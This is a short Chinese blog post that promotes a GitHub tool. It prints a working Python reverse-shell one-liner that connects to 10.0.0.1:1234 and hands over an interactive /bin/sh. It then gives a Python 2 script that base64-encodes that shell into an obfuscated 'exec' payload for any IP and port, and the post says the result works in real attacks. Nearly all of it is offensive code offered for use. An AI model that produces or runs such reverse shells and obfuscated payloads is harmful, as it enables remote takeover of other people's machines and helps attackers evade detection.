地址:https://github.com/donghouhe/python_fantan_shell_encode/blob/master/netcat_encode.py 如果你觉得可以,点个star鼓励一下
这是原始的一句命令
|
1 |
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);’ |
运行后,一个shell就反弹到攻击者电脑了。
但是,它不好看, 不够... 炫, 你懂吗?
于是,我要把代码base64编码一下, 让他看上去更cool, 我完成了;
'''
data: 2015.2.2
author:
____ __ __ __ __
/\ _`\ /\ \/\ \ /\ \/\ \
\ \ \/\ \ ___ ___ __\ \ \_\ \ ___ __ __\ \ \_\ \ __
\ \ \ \ \ / __`\ /' _ `\ /'_ `\ \ _ \ / __`\/\ \/\ \\ \ _ \ /'__`\
\ \ \_\ \/\ \L\ \/\ \/\ \/\ \L\ \ \ \ \ \/\ \L\ \ \ \_\ \\ \ \ \ \/\ __/
\ \____/\ \____/\ \_\ \_\ \____ \ \_\ \_\ \____/\ \____/ \ \_\ \_\ \____ \/___/ \/___/ \/_/\/_/\/___L\ \/_/\/_/\/___/ \/___/ \/_/\/_/\/____/
/\____/
\_/__/
'''
from base64 import encodestring
from sys import argv
try:
print "python -c \"exec( __import__( 'base64' ).decodestring(", '\'' + encodestring("s=__import__('socket').socket(__import__('socket').AF_INET,__import__('socket').SOCK_STREAM); s.connect(('{}', {})); __import__('os').dup2(s.fileno(),0); __import__('os').dup2(s.fileno(),1); __import__('os').dup2(s.fileno(),2); p=__import__('subprocess').call(['/bin/sh','-i'])".format(argv[1], argv[2])).replace('\n', '\\n') + '\'', ") )\"" # = = i couldn't use str1 + str2
except:
print 'Usage: python nc.py ip port'
有点产生payload的意味了。
3张图看效果
实战中也毫不逊色
时间: 2024-08-26 06:50:08